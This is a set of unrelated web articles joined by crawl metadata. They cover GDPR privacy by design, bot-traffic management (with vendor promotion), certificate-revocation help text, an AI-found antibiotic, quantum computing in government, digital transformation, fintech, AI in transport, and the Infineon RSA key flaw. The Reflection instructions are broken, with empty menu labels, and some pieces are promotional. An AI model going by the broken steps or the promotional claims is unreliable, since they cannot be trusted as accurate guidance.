- What is the outcome of implementation? By default, only personal data which are necessary for each specific purpose of the processing are processed. Also, data should not be made accessible to a large number of persons without the intervention of the data owner/custodian (which relates to the “deny-first” principle, enabling access to data for only a limited number of authorised persons).
- Who is responsible? Data controllers and processors (as implied by Article 28). To help you determine their roles and how to establish good relationships with them, check out this article: The obligations of controllers towards Data Protection Authorities according to GDPR.
- How and when is it supposed to be applied? Both at the time of the determination of the means for processing and at the time of the processing itself – which translates to the design phase of the development of new systems and business practices, as well as assuring privacy assurance of existing personal data repositories.
- Ok, but what does it actually impose on the data controllers? The obligation applies to the amount of personal data collected, the extent of its processing, the period of its storage and its accessibility.
- Which factors influence the implementation? The actual implementation decision should take into account the technological environment, the cost of implementation, and the nature, scope, context and purposes of processing. Also, the selection of the process or tool of choice should be based upon the risk assessment results, taking into account the severity of the risk to the rights and freedoms of data subjects – the latter translates to the necessity of using Data Protection Impact Assessments (DPIAs), while the former leaves the final decision to the Data Controller, without stipulating any specific obligations. To find out more about the DPIA, check out this free webinar: Seven steps of Data Protection Impact Assessment (DPIA) according to EU GDPR.
Hopefully, this breakdown illustrates the vagueness of the principle, as outlined in the GDPR – there is no regulation-imposed measure, rather a set of suggestions, mentioning data minimisation and pseudonymisation.
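Although the regulation stops short of prescribing concrete measures, the two techniques it does name — pseudonymisation and data minimisation — are easy to illustrate. The sketch below is illustrative only: the field names, the keyed-hash (HMAC) approach to pseudonymisation, and the key-handling comment are assumptions, not anything Article 25 mandates.

```python
import hmac
import hashlib

# Secret key held separately from the data store; without it, the
# pseudonym cannot be linked back to the original identifier.
SECRET_KEY = b"rotate-me-and-store-me-separately"

def pseudonymise(identifier: str) -> str:
    """Replace a direct identifier with a stable keyed hash (HMAC-SHA256)."""
    return hmac.new(SECRET_KEY, identifier.encode("utf-8"), hashlib.sha256).hexdigest()

def minimise(record: dict, needed_fields: set) -> dict:
    """Keep only the fields required for the stated processing purpose."""
    return {k: v for k, v in record.items() if k in needed_fields}

record = {"email": "alice@example.com", "age": 34, "favourite_colour": "green"}
processed = minimise(record, needed_fields={"age"})
processed["subject_id"] = pseudonymise(record["email"])
# 'processed' now carries no direct identifier, and only the data
# needed for the stated purpose (here: age-based analysis).
```

Because the key is stored separately from the data, records alone cannot be linked back to a person — which is exactly the property the regulation asks pseudonymisation to provide.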
The “privacy by design” approach vs. the GDPR’s “Data protection by design & default” concept
The reader is faced with two terms, both including the same phrase (“by design”) but each originating in a different era. What follows is first an explanation of the differences, then a summary of the principles valid for both concepts.
The “original” privacy by design approach is not about data protection; rather, it focuses on designing the system in such a way that data doesn’t need protection. The key concept here is anonymisation: a system designed as “fully” privacy compliant simply wouldn’t include disclosure of personally identifiable data to the data controller, while at the same time enabling certain system functionality. An example could be drawn from the Global Positioning System (GPS) device in the context of fleet management solutions – a vehicle’s GPS device enables detection of geographical location, without revealing the driver’s identity.
Somewhat contrary to that, with “Data protection by design & default”, the GDPR adopts the view that processing of personal data is inevitable; therefore, integration of “the necessary safeguards into the processing” is obligatory. It also brings a widening of scope, making it more of a multi-faceted concept. Along with the design of information technologies and systems, it also involves various organisational components, which implement privacy and data protection principles in systems and services.
Seven core principles of privacy by design
Now, let’s focus on the similarities. The “by design” principle in both approaches expresses the need for embedding privacy concerns in the design and operation of systems for personal data processing, business practices and physical design.
The approach specifies seven core principles:
- Being proactive rather than reactive – by anticipating and preventing privacy-invasive events beforehand, the aim is to prevent privacy risks from materialising.
- Privacy as the default setting – by ensuring that personal data is automatically protected in any given IT system or business practice, data subjects’ personal information is protected from the beginning of the lifecycle, and remains protected, without action required on their part.
- Privacy embedded into design – by integrating privacy into the system (without reducing functionality), it is recognised as the core component, rather than being thrown in later as an add-on.
- Full functionality – privacy should not be incorporated at the expense of, or as a trade-off for, functionality, security and performance.
- End-to-end security (providing full life-cycle management of data) – this involves ensuring that all personal data is securely collected, stored, processed, shared/disclosed and then securely destroyed at the end of the process.
- Visibility and transparency of data – this refers to forcing transparency of the processing practices in accordance with the stated promises and objectives, making them visible to the data subjects and processors and subject to independent verification (audit).
- Respect for user privacy (user-centric) – this requires architects and operators to protect the interests of the data subject by offering such measures as strong privacy defaults, appropriate notice, and empowering, user-friendly options.
Principles in theory vs. practice
All these principles sound excellent (as principles often do). And, while some efforts to put the theory into practice are relatively straightforward and quickly winnable (e.g., developing and publishing privacy policies and notices, introducing privacy awareness programs, assessing data retention obligations, locking file cabinets with employee records), those falling into the technology realm require a more exhaustive approach.
However, serious discussions about privacy principles themselves require a change of mindset in the organisation’s environment. This helps to establish an ongoing effort of raising the level of privacy assurance. And, the best way to raise this GDPR-weighted lever is by starting from the top, all the way down to the very machine running a business – the people and production systems.
Click here to read the full text of the GDPR to find out more about the privacy by design approach. | <urn:uuid:30a69a2e-a9eb-41ed-ba02-5665fc2cf8b4> | CC-MAIN-2024-38 | https://advisera.com/articles/what-is-privacy-by-design-and-default-according-to-gdpr/ | 2024-09-15T20:02:23Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651647.78/warc/CC-MAIN-20240915184230-20240915214230-00128.warc.gz | en | 0.925852 | 1,486 | 2.953125 | 3 |
Any non-human traffic on a website or an app is called bot traffic. Bots are a common occurrence on the internet and constitute nearly two-thirds¹ of the total internet traffic.
Bot traffic is generally considered dangerous. However, depending on their use, bots can also be beneficial, such as in services like digital assistants and search engines.
On the other hand, bad bots can be used to steal information and launch several types of attacks that can jeopardize business operations and adversely impact revenue and user experience. This is why it is essential for digital businesses to effectively manage bots visiting their digital platforms.
Should businesses block bot traffic?
Although good bots can improve a business’s visibility through search engines, bad bot traffic can cause immense harm by disrupting website performance, compromising security, and causing customer dissatisfaction. Bots increasingly power complex attacks including credential stuffing, account takeover, fake account generation, price scraping, and more. Therefore, businesses must be able to distinguish between useful and malicious bot traffic in order to take effective countermeasures against bad bots.
How does bot traffic affect business?
Malicious bots continue to pose a growing challenge for digital businesses. Not only are bots used to steal consumer and business information; huge volumes of bot traffic are also used to overwhelm digital platforms, slowing page load speeds and degrading visitor experience.
- Attacks: Large amounts of bot traffic can be used to launch distributed denial of service (DDoS) attacks, making websites unavailable to genuine customers. The delay in access to the platform, especially in the ecommerce and travel industries, can force customers to switch over to competitors, causing revenue losses to the affected businesses.
- Disruption: Bot traffic is also used to disrupt social media platforms by artificially inflating the number of followers or liking a post, influencing public opinion, tarnishing the image of public figures, and spreading disinformation that can lead to disharmony and conflicts.
- Performance: When bot traffic is used to attack pay-per-click ads, the advertising industry can suffer a setback in the form of distorted SEO results and skewed data analysis. This is because bot traffic can trigger fake ad clicks (click fraud), which affect pay-per-click ads. Further, website analytics are distorted by the deviations bot traffic causes in data such as page views, time spent, bounce rate, and user location.
- Traffic: Unusually high bot traffic is often used to hoard inventory. Bots add enormous amounts of merchandise to carts with no intention of purchasing it, solely to prevent genuine customers from accessing it. Inventory hoarding obstructs efforts to improve conversion rates; on the contrary, it increases cart abandonment rates. Often, bot traffic is used to scrape data, including personal information of consumers such as phone numbers and email IDs as well as sensitive business data, which is then used to facilitate phishing attacks.
- Data Loss: Data is also extracted by using bot traffic to infect devices with malware and take control of them. These infected devices can be connected to form a botnet that launches more complex attacks at scale. Large volumes of bot traffic can also hinder fraud prevention efforts by generating unnecessary noise.
Telltales of bot traffic
Detecting bots is crucial to maintaining overall security of the digital platform. However, security teams must ensure that bot detection does not lead to false positives or false negatives. There are certain telltales that can help security teams identify bot traffic. Some of these include:
- Pageviews: An abnormal spike in pageviews could likely be a handiwork of bots.
- Bounce rate: A high bounce rate could indicate heightened bot traffic to the website.
- Session duration: Unusual increases or decreases in session duration – the time users spend on a website – can indicate bot activity, since bots may browse much slower or faster than human visitors.
- Conversions: Surge in form submissions, account creation, or conversions using fake user details can be due to bot traffic.
- Location-specific traffic: A spike in traffic from a specific geographical location, especially not the target customer base of the business could indicate bot traffic.
- IP-specific traffic: An increase in user requests from a single IP within a short duration could be bot traffic.
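Several of these telltales can be computed directly from server access logs. As a minimal sketch (the log format, window size, and threshold are illustrative assumptions, not a product recommendation), the last telltale — a burst of requests from a single IP within a short duration — could be flagged like this:

```python
from collections import defaultdict

def find_suspect_ips(requests, window_seconds=60, threshold=100):
    """Flag IPs that exceed `threshold` requests within a rolling window.

    `requests` is an iterable of (timestamp_seconds, ip) pairs, assumed
    sorted by timestamp, as in a typical access log.
    """
    recent = defaultdict(list)   # ip -> timestamps still inside the window
    suspects = set()
    for ts, ip in requests:
        bucket = recent[ip]
        bucket.append(ts)
        # Drop timestamps that have fallen out of the rolling window.
        while bucket and ts - bucket[0] > window_seconds:
            bucket.pop(0)
        if len(bucket) > threshold:
            suspects.add(ip)
    return suspects

# 150 requests in ~15 seconds from one IP, plus one normal visitor:
log = [(t // 10, "203.0.113.9") for t in range(150)] + [(300, "198.51.100.1")]
print(find_suspect_ips(log))  # {'203.0.113.9'}
```

In production this kind of heuristic is only a first filter — sophisticated bots rotate IPs precisely to stay under per-IP thresholds, which is why the article goes on to discuss dedicated bot management solutions.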
How can businesses manage bot traffic?
Since bot traffic has the potential to disrupt operational efficiency of digital platforms and expose them to heightened risks, it is imperative that businesses deploy appropriate countermeasures to stop bots from negatively impacting their business and user experience.
To identify bot traffic and prevent it from causing harm to their digital platforms, businesses can consider using the following:
- Robots.txt file: This file can be included to provide instructions for bots crawling the page. It can also be used to completely prevent bots from interacting with the website.
- CDN: A Content Delivery Network (CDN) is a distributed platform of servers that can help reduce delay in loading web pages. It also alleviates the risk of a sudden surge in bot traffic to help optimize the website performance.
- Add HTTPS: Adding HTTPS to the website creates an encrypted channel between the website and its users, providing better security to the information traversing between the server and the browser.
- Tools: Deploy tools such as rate limiting solutions, DDoS mitigation, Web Application Firewalls (WAF), and access control lists (ACL).
- Bot management solutions: Add a layer of security to detect and prevent bot traffic, especially intelligent bots that can mimic human behavior.
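Of the measures above, the robots.txt file is the simplest: a plain-text rule set that well-behaved crawlers fetch and honour (malicious bots are free to ignore it, which is why it is a first line of defence rather than a security control). Python's standard library can parse such a file; the rules below are a made-up example for illustration:

```python
from urllib import robotparser

# An illustrative robots.txt: block one named crawler entirely,
# and block every other bot from the /private/ section.
rules = """\
User-agent: BadBot
Disallow: /

User-agent: *
Disallow: /private/
"""

rp = robotparser.RobotFileParser()
rp.parse(rules.splitlines())

# Well-behaved crawlers call can_fetch() before requesting a URL.
print(rp.can_fetch("*", "https://example.com/public/page"))    # True
print(rp.can_fetch("*", "https://example.com/private/page"))   # False
print(rp.can_fetch("BadBot", "https://example.com/anything"))  # False
```

The same parser is what a compliant crawler runs on its side; a site operator only needs to serve the text file at `/robots.txt`.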
Hallmarks of a good bot detection solution
Considering the advancements in bot technology and the human-like capabilities bots have acquired, an effective bot detection solution should be able to block bots of all sophistication levels in real time. In addition, bot management solutions should integrate easily with other tools and the organization’s existing security infrastructure to avoid adding undue technical debt.
Why work with Arkose Labs for bot traffic management?
Malicious bot traffic can be a grave risk for digital platforms and cause financial and reputational losses. Rooting out bad bot traffic using an efficient bot management solution, such as Arkose Labs, should be a priority for digital businesses.
Global brands trust Arkose Labs for effective bot traffic management. Arkose Labs’ bot management solution accurately distinguishes bot traffic from humans and uses proprietary enforcement challenges to block it. Even the most intelligent and human-like bots cannot clear these challenges at scale, because the challenges are trained against the latest computer vision technologies, making them resilient to bots’ advanced capabilities.
Using embedded machine learning, historical attack pattern calibration, and anomaly detection, Arkose Labs segments incoming traffic according to the risk assessment. Further, using a ‘clear box’ approach to deliver actionable insights, Arkose Labs provides security teams with clear explanations for risk classifications and the flexibility to segment traffic for remediation through proprietary challenge-response technology. This combination of transparency and dynamic attack response allows security teams to efficiently manage bot traffic on their digital platforms.
Reflection SSL/TLS and Secure Shell connections can be configured to authenticate hosts using digital certificates. Digital certificates (also called X.509 certificates) are an integral part of a PKI (Public Key Infrastructure) and are issued by a certificate authority (CA), which ensures the validity of the information in the certificate. Each certificate contains identifying information about the certificate owner, a copy of the owner's public key (used for encrypting and decrypting messages and digital signatures), and a digital signature generated by the CA based on the certificate contents; a recipient uses the signature to verify that the certificate has not been tampered with and can be trusted. To ensure that certificates have not been revoked, you can configure Reflection to check for certificate revocation using CRLs — digitally signed lists of certificates that the CA has revoked and that are therefore no longer valid — or using an OCSP responder, which answers certificate status requests over HTTP with one of three digitally signed responses: "good", "revoked", or "unknown". Using OCSP removes the need for servers and clients to retrieve and sort through large CRLs.
When CRL checking is enabled, Reflection always checks for CRLs in any location specified in the CRL Distribution Point (CDP) field of the certificate. In addition, Reflection can also be configured to check for CRLs located in an LDAP directory or to query an OCSP responder.
Reflection's default value for certificate revocation checking is based on your current system setting. If your system is configured to do CRL checking, all Reflection sessions will check for certificate revocation using CRLs by default.
NOTE:When Reflection is running in DOD PKI mode, certificate revocation is always enabled and cannot be disabled.
To enable CRL checking for all SSH sessions
1. In Internet Explorer, choose > > .
2. Under , select .

Using Reflection, you can enable certificate revocation checking using either a CRL or an OCSP responder.
To enable CRL checking for a Secure Shell session (FTP Client and SSH terminal sessions)
1. Open the dialog box.
2. Click the or .

To enable CRL checking for SSL/TLS sessions (FTP Client only)

1. Open the dialog box.
2. On the tab, click Configure PKI. ( must be selected.)
3. Select either .
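Reflection's dialogs are product-specific, but the underlying mechanism is the same one most TLS stacks expose. As a hedged illustration — this uses Python's standard ssl module, not Reflection's API, and the commented-out file names are placeholders — a client can require CRL checking of the peer's leaf certificate like this:

```python
import ssl

# Client-side TLS context with normal certificate verification enabled.
context = ssl.create_default_context()

# Additionally require that the server's leaf certificate be checked
# against a locally loaded CRL during the handshake.
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF

# The CRL must be loaded alongside the CA certificates; if no matching
# CRL is available, every handshake fails certificate verification.
# context.load_verify_locations(cafile="ca-bundle.pem")        # trust anchors
# context.load_verify_locations(cafile="revocations.crl.pem")  # CRL in PEM form

print(bool(context.verify_flags & ssl.VERIFY_CRL_CHECK_LEAF))  # True
```

Using `VERIFY_CRL_CHECK_CHAIN` instead extends the check to every certificate in the chain, which corresponds to the stricter of the revocation-checking options described above.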
Scientists have used artificial intelligence (AI) to discover a new antibiotic, abaucin, that has been reported to show useful activity and kill off deadly superbugs. New evidence suggests that abaucin is effective against Acinetobacter baumannii (A. baumannii), which the World Health Organisation has identified as a “critical” threat to humanity.
As reported by BBC news, the AI helped narrow down thousands of potential chemicals to just a handful that could be tested in the laboratory. The result of which proved that an experimental antibiotic could prove to be very effective, but it will need to undergo further testing before it can be used.
AI trained to analyse nearly 7000 compounds
Acinetobacter baumannii is a so-called ‘superbug’ that can cause infections in the blood, urinary tract, and lungs (pneumonia), or in wounds in other parts of the body. According to the CDC, it can also “colonise” or live in a patient without causing infections or symptoms, especially in respiratory secretions or open wounds. These types of infections typically occur in people in healthcare settings, ultimately impacting already unwell or immunocompromised patients.
Researchers used an AI algorithm to screen thousands of antibacterial molecules in the hopes of predicting new structures. As a result of the screening, researchers were able to identify a new antibacterial compound: abaucin.
This was after the AI model was used to analyse 6,680 compounds that it had not encountered before. The process took an hour and a half and the result was that 240 compounds could be tested in the laboratory, ultimately revealing nine potential antibiotics - one of which being abaucin.
“We had a whole bunch of data that was just telling us about which chemicals were able to kill a bunch of bacteria and which ones weren’t. My job was to train this model, and all that this model was going to be doing is telling us essentially if new molecules will have antibacterial properties or not,” said Gary Liu, a graduate student from MacMaster University who worked on the research, as reported by The Guardian.
Sparking the medical revolution?
Laboratory experiments involved testing abaucin on mice with open wounds; these confirmed that it was able not only to suppress the infection but also to kill A. baumannii samples taken from patients. Researchers believe that the precision of abaucin will ultimately help combat drug resistance.
The researchers in Canada and the US have said that AI has the power to massively accelerate the discovery of new drugs. Professor James Collins, from the Massachusetts Institute of Technology (MIT), said to the BBC: "This finding further supports the premise that AI can significantly accelerate and expand our search for novel antibiotics.”
Also working in the laboratory is Dr Jonathan Stokes, from McMaster University, who expects that the first AI antibiotics could take until 2030 until they are available to be prescribed. He added: "AI enhances the rate, and in a perfect world decreases the cost, with which we can discover these new classes of antibiotic that we desperately need."
This discovery comes in the wake of AI being used more extensively within the healthcare industry. As reported in April 2023, Google DeepMind in particular has achieved many scientific breakthroughs with its AI system AlphaFold, which is able to predict protein structures.
(FedTechMagazine) Many IT decision-makers seem unsure about the basics of quantum technology, and it’s unclear how this new approach might be implemented in federal agencies.
Thyagarajan Nandagopal, acting deputy assistant director of the Computer and Information Science and Engineering directorate at the National Science Foundation, points to quantum’s special strength in building and breaking encryption algorithms. This could impact security across government, and it might have special implications for the military.
If quantum helps us see deeper into biological processes, the Agriculture Department could use it to tweak photosynthesis and perhaps grow food more efficiently.
It might just make daily government processes more efficient. “A data set that takes days or months to churn through could give us answers in just a couple of seconds,” Nandagopal says. “That means you can make a sound policy decision based on that data much more quickly.”
In the near term, government’s biggest role may be in helping to further the evolution of this emerging technology. Government labs and government-funded universities play an important role in fundamental research and the education of future quantum computing scientists and engineers. | <urn:uuid:31a26f6a-2ec1-474a-9013-b65739a4c66e> | CC-MAIN-2024-38 | https://www.insidequantumtechnology.com/news-archive/how-federal-agencies-may-implement-quantum-computing/amp/ | 2024-09-20T16:17:28Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701419169.94/warc/CC-MAIN-20240920154713-20240920184713-00628.warc.gz | en | 0.934527 | 241 | 2.828125 | 3 |
At its core, digital transformation is the process of integrating forward-thinking technology into all areas of an organization — something that brings with it a host of unique benefits.
For starters, digital transformation is an excellent way to improve efficiency. It allows employees to leverage modern technology to work smarter, not harder, saving time, money, and resources in the process. It’s also an ideal way to increase transparency: organizational leaders can better understand their employees’ current processes and where inefficiencies exist, allowing them to address those inefficiencies as quickly as possible.
While it’s true that much of the discussion of digital transformation is usually centered around private businesses, it’s a process that can truly benefit an organization like a state government, too. It’s arguably more important within this context as it directly impacts the hardworking people who live and work in a particular community.
Why Digital Transformation Matters
One of the reasons why it’s so critical for state agencies to take a proactive approach to digital transformation has to do with just how quickly the technology landscape is changing in the first place.
It’s long been an issue that technology and related services are evolving so rapidly that it’s difficult to draft and implement laws designed to protect consumers. Issues surrounding data privacy are commonplace.
In January of 2020, for example, California’s CCPA, or “California Consumer Privacy Act,” took effect in an attempt to better define what is and isn’t legal in terms of data privacy. Unfortunately, this legislation quickly proved to be confusing at best and inadequate at worst.
Facial recognition technology is another great example. On your average smartphone, the technology can be used to authenticate someone’s identity to give them access to the device and to prevent others from doing the same. But in the context of a state government, it brings with it issues of how it might be used in terms of surveillance by local law enforcement.
A digital transformation project not only helps agencies serve their constituents but can also help them ensure they’re not lagging.
Digital transformation for state agencies should always be designed around the actual needs and preferences of the people who live in their jurisdiction. Technologies like facial recognition should not be introduced into public services simply for their own sake; otherwise, many of the issues outlined above become a foregone conclusion.
Another reason why it’s so dangerous for state agencies to use lagging technology has to do with a negative ripple effect. In the short term, it creates bureaucratic bottlenecks almost everywhere. The people who need access to certain services to better live their lives don’t have it, creating a poor experience for all involved.
But in a larger sense, it also creates needless inefficiencies for the organizations that are regulated by state agencies. In a lot of areas, certain types of businesses have to report information to state agencies as a part of their daily operations. If one such agency is up-to-date with modern platforms and another is still using technology from a decade ago, it creates a lack of consistency that gives way to human error. Those businesses now have to spend time inputting the same information in entirely different formats, which only raises their costs and wastes their time, as well.
There are also local governments that still require businesses to report data by way of paper forms. This further delays the data getting into the hands of the people who need it most, and it opens the door to a plethora of other issues.
As opposed to a file on a secure server, a paper form is often difficult to find and easy to lose. People spend so much time in a day looking for information that they have less time to act on it, which poses significant problems.
In the end, digital transformation for state agencies is no longer a recommendation; it’s officially a requirement. Even the communication and collaboration benefits alone would make the effort more than worth it, to say nothing of how it can help meaningfully improve the lives of citizens in our communities.
The field of finance is rapidly changing: financial firms, insurance agencies, and investment banks all operate at the intersection of data and technology. Big data, machine learning, algorithms, and blockchain technologies are increasingly being used to conduct business.

Financial technology, or fintech, originally referred to the back-end technology used to run traditional financial services. Today, however, the term has broadened to incorporate newer innovations in the finance sector, such as cryptocurrencies, blockchain, robo-advising, and crowdfunding.

In this article we will learn more about fintech: its history, its current scope, its functions, and its advantages and use cases.
Adoption of Fintech
Technology has played a key role in every sector, including finance. It has come a long way, but where did the adoption of financial technology infrastructure begin?
The years 1887 to 1950 were an era in which technologies such as the telegraph, railroads, and steamships allowed, for the first time, rapid transmission of financial information across borders.

The 1950s brought credit cards, the 1960s brought ATMs, and the 1970s brought electronic stock trading; the 1980s introduced bank mainframe computers and more sophisticated record-keeping systems, and the 1990s brought the internet and e-commerce.

In the 21st century we use mobile phones, wallets, payment applications, equity crowdfunding, robo-advisors, cryptocurrency, and many other financial technologies that have changed the face of banking services.
In today’s digital era, the traditional services once provided by financial institutions no longer meet the demands of tech-savvy customers. Consumers have become used to the digital experience and ease of use provided by global giants like Apple, Microsoft, and Facebook, where a simple click or swipe on a smartphone gets tasks done. As per the 2019 Global Fintech Report, the industry raised $24.6 billion, with funding topping $8.9 billion in the third quarter of the financial year.
Fintech refers to technology and innovation that aims to compete with traditional financial services and create new and better service experiences for consumers in the banking, asset management, wealth management, investment, insurance, and mortgage sectors. Within the financial industry, some of the technologies used include artificial intelligence, big data, robotic process automation (RPA), and blockchain. Artificial intelligence is used in various forms: AI algorithms are used to predict changes in the stock market and provide insight into the economy, customer spending habits can be charted, and chatbots are used to help customers with their services.
Artificial intelligence works best in combination with big data and data management solutions. AI analyses the performance of financial institutions, creates insights, and automates essential organizational processes such as documentation and client communication. Machine learning (ML) is a key component of AI and is widely used in many areas of the banking sector, such as:
- Fraud prevention – ML tools analyse existing fraud cases, detect common patterns, evaluate and predict possible fraud, and uncover discrepancies
- Risk management – software analyses organizational performance and detects potential threat patterns
- Fund development prediction – by scanning investment records, an ML-powered tool can identify the most probable future developments
- Customer service enhancement – by analysing customer data, ML can build a smart consumer profile
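As a toy illustration of the fraud-prevention idea above (spotting transactions that break a customer’s usual pattern), the sketch below flags amounts far from an account’s historical mean. Real systems use trained ML models over many features; this z-score baseline only illustrates the principle, and the class and method names are our own:

```java
import java.util.ArrayList;
import java.util.List;

public class TransactionScreen {
    // Flags amounts that deviate from the account's mean by more than
    // `threshold` standard deviations -- a stand-in for the pattern
    // deviations a trained fraud model would learn from data.
    public static List<Double> flagOutliers(List<Double> amounts, double threshold) {
        List<Double> flagged = new ArrayList<>();
        if (amounts.isEmpty()) {
            return flagged;
        }
        double mean = 0;
        for (double a : amounts) mean += a;
        mean /= amounts.size();
        double variance = 0;
        for (double a : amounts) variance += (a - mean) * (a - mean);
        double std = Math.sqrt(variance / amounts.size());
        for (double a : amounts) {
            if (std > 0 && Math.abs(a - mean) / std > threshold) {
                flagged.add(a);
            }
        }
        return flagged;
    }
}
```

On a history of small everyday purchases, a single very large transaction stands out and gets flagged for review, while the routine amounts pass through untouched.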
Pros and Cons of FinTech

Pros:

- Increased accessibility and approachability for a larger section of the population
- Faster approval of financing or insurance
- Greater convenience for customers, who can access services from mobile devices, tablets, or laptops anywhere
- Lower operating costs, as companies are not required to invest in physical infrastructure such as a branch network
- Major investments in security to keep customer data safe, using technologies like biometrics and encryption

Cons:

- Limited access to soft information
- Standards, procedures, and business activities that differ from those of traditional banks, along with higher charges imposed by the OCC (Office of the Comptroller of the Currency)
Benefits of FinTech
- Speed and convenience, as fintech products and services are delivered online in a quicker and easier manner
- A greater choice of products and services, since they can be bought remotely irrespective of location
- More personalized products, since collecting and storing more information about customers enables firms to offer consumers products and services tailored to their requirements and buying patterns
Artificial intelligence has been a far-off dream for decades, but recent advances in AI have shown that we could soon be using it to solve some of society’s biggest problems. Almost two years ago, in January of 2016, AI beat the world’s best player of the game Go, which is incredibly complex and has more potential board positions than there are atoms in the universe. This shows that computers are now able to surpass human capabilities in some complex tasks, even if that task is a game. AI has gotten better at voice and face recognition, and error rates are getting lower and lower, signaling the start of widespread AI use.
While playing games and tagging Facebook photos are interesting and promising AI accomplishments, more practical applications of AI are on the horizon. Those applications will include helping the transportation industry to solve some of our biggest challenges in getting from place to place. Here are 4 important ways AI will help improve our transportation system.
1. Urban Design
Urbanization has grown in the last few decades, causing skyrocketing housing prices, pollution, and increased congestion on roadways. 50% of the global population already lives in cities, and that percentage is expected to increase to 70% over the next 40 years. Public transportation is an essential service in urban areas, as pollution and traffic from growing numbers of personal vehicles become even greater issues. AI can help offset these realities of urbanization by optimizing essential urban design.
Easing congestion in cities involves massive amounts of data, collected by sensors and cameras. AI can assist with urban design and traffic control in several ways, including adjusting variable speed zones based on traffic, traffic light timing, and smart pricing for vehicle tolls.
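As a deliberately simple illustration of data-driven signal timing, the sketch below splits a fixed cycle among intersection approaches in proportion to measured queue lengths. Deployed adaptive systems use far richer traffic models; this proportional rule, and all names in it, are our own illustrative assumptions:

```java
public class SignalTiming {
    // Allocates green time to each approach proportionally to its queue
    // length, within a fixed signal cycle. A naive baseline, not a real
    // adaptive controller; integer division may leave a few spare seconds.
    public static int[] greenTimes(int[] queueLengths, int cycleSeconds) {
        int total = 0;
        for (int q : queueLengths) total += q;
        int[] green = new int[queueLengths.length];
        for (int i = 0; i < queueLengths.length; i++) {
            green[i] = (total == 0)
                    ? cycleSeconds / queueLengths.length   // no demand: split evenly
                    : cycleSeconds * queueLengths[i] / total;
        }
        return green;
    }
}
```

With queues of 30, 10, and 20 vehicles and a 120-second cycle, the approaches get 60, 20, and 40 seconds of green respectively; sensor data directly reshapes the timing plan.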
2. Car Communication
Key to the future of autonomous vehicles is car communication. Avoiding collision is, of course, a top priority for self-driving car developers, and these efforts have been largely successful. However, mini communications take place between drivers, cyclists, and pedestrians all the time—we often don’t even register how often we make eye contact with others on the road. So how can an automated vehicle safely navigate the many hazards of the road? AI advancements are making it possible.
Drive.ai is the most prominent company using deep learning to solve these communication obstacles facing self-driving cars, and see these vehicles as “social robots”. This AI advancement, and ability to pick up the nuances of human cues will be essential during the inevitable transition period: some cars on the road will be autonomous, and some will not. The AI needs to be able to not only navigate cues on the road, but provide them to drivers, ensuring safety for everyone. Drive.ai isn’t building autonomous vehicles; they’re outfitting existing vehicles with the sensors and other hardware they need to become autonomous, making it easier than ever to improve car communication.
3. Manufacturing

We’ve been quickly refining manufacturing techniques and technology since the first Industrial Revolution, and AI will be key in the next evolution of manufacturing. 3D printing and AI will mean that creating better forms of transportation will be more efficient and more dynamic. Automation and real-time feedback from vehicles on the road will help manufacturers optimize their products quickly. Instead of waiting for vehicles (both personal and commercial) to be shipped from overseas, they will be able to be manufactured locally, cutting down on wait times and resulting in better manufacturing without human intervention.
4. Optimization Through Machine Learning
In a nutshell, machine learning describes the ability of machines to learn without being given directives via programming. Machine learning is essential for future transportation systems, since self-driving cars need to be able to adapt to their environment, and will almost certainly not have programming to deal with every single situation the vehicle could encounter on the road. As more autonomous vehicles get on the road, they will use the information they gain through everyday driving situations to optimize themselves. AI is getting smarter thanks to innovative programmers—but it’s also making our transportation system better by building on the building blocks these programmers provided.
Infineon’s RSA Vulnerability Reveals Seismic Fault Line in Cybersecurity
Recently, researchers at Masaryk University made a startling discovery when they uncovered a serious vulnerability in the cryptographic library used in security chips manufactured by Infineon since 2012.
These chips—used in TPMs, smart cards, and other environments—are so common as to be practically ubiquitous. The potential consequences are just as far-reaching, placing people at greater risk of identity theft, decryption of confidential data, injection of malicious code into digitally signed software, and bypassed protections that prevent accessing or tampering with a stolen PC.
The vulnerability is especially problematic as it is located in code that complies with two security certification standards, NIST FIPS 140-2 and CC EAL5+, which are pervasive throughout the networks of many governments, contractors, and companies around the world. The paper, scheduled for publication in early November, is not yet available in its entirety, but its title reveals that the RSA key generation of these chips is particularly vulnerable to a form of Coppersmith’s attack.
More specific details about the potential for attack will be presented at the ACM Conference on Computer and Communications Security (CCS) on October 30, but the flaw is already having a significant impact on many applications and systems.
The Vulnerability Found In Infineon's Chips Has Already Had A Widespread Effect
On August 30, researchers alerted officials in Estonia that 750,000 government identity cards, issued since October 2014, might be compromised. These cards—used for online authentication, digital contracts, business, access to government services, and more—are more common and more significant than driver’s licenses. The vulnerability makes identity theft possible without the need for physical access to the card itself, since only the public key is required. As a result, Estonian officials have announced that they will shut down the public key database.
Also impacted are Trusted Platform Modules that have become standard to ensure system integrity and protection. A TPM is the standard cryptographic chip built into computers to store sensitive information like encryption keys. Storing this information on a chip is usually significantly safer than relying on software, which is easier to compromise. (Though it is important to note that not all vendors use chips from Infineon.)
In an interview with Ars Technica, the researchers revealed that they examined a sampling of 41 different laptop models that use TPMs. About 25 percent used Infineon's vulnerable chip. The vulnerability is especially critical for TPM version 1.2, because Microsoft's BitLocker is affected—greatly increasing the potential for hackers and threat actors to access protected, confidential data on stolen or lost laptops. Besides BitLocker, TPMs are critical for other security features in Microsoft’s Windows, and administrators are urged to take mitigation actions.
Since RSA has become a critical part of the foundation of internet security, these examples could prove to be the very tip of the iceberg.
In the same interview, the researchers further mentioned that they scanned the Internet for fingerprinted keys and quickly found hits in a variety of interesting places. They discovered vulnerable keys in certificates used for Transport Layer Security. (Interestingly, many contain the string “SCADA” in the common name field.)
This raises the possibility that vulnerable keys are used in SCADA systems which usually control the industrial equipment that is used in critical infrastructure. The Department of Homeland Security identifies 16 different critical infrastructure sectors—including chemical, communications, energy, financial services, food and agriculture, water systems and nuclear reactors.
The researchers went on to test PGP keys used for email encryption. Out of nearly 2900 tested, more than 950 were affected—the majority generated by the Yubikey 4, a product by Yubico which is using the vulnerable chip. Furthermore, they found 447 fingerprinted keys on the internet used to sign GitHub submissions. More than half (237) showed the vulnerability. GitHub has since been notified of the fingerprinted keys and is in the process of getting users to change them.
As disconcerting as these findings alone may be, they represent merely a sample of vulnerable keys. It is estimated that there are a significantly more out there.
So how likely is an attack?
